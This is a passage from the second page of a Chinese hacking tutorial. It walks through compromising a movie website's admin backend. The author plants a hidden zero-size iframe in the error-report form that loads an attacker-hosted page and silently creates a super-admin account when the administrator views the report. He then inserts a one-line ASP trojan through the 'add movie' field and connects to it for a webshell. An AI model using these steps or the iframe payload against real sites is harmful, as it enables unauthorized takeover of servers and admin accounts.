把上面的代码为hacklu.htm上传到自己的空间。然后再来到错误报告的地方写上我们的挂马代码： <iframe src=http://www.hacklu.net/tu/hacklu.htm width=0 height=0></iframe> ，www.hacklu.net是我空间的地址。这样管理员在看错误报告的时候就会添加一个名为：hacklu119的超级管理员。如图3、图4所示。





其实我们还可以构造备份WEBSHELL什么的，只是这个后台没有备份数据库的功能。所以得到WEBSHELL有一定的困难。刚开始我在添加电影的地方上传ASP木马。又是抓名又是改扩展名的，可惜还没有成功。后来不经意发现原来这个数据库是ASP的，那么就好办了。只接在添加电影的地方写上我们的一句话的ASP木马，如图5所示。



最后添加一下我们用客户端连接 http://127.0.0.1/data/jdzcn.asp 如图6所示，连接成功后会生成killbase.asp文件。最后成功得到WEBSHELL。见图7。





不过如果数据库改了名字的话，那么得WEBSHELL就不容易了。

上一页  [1] [2]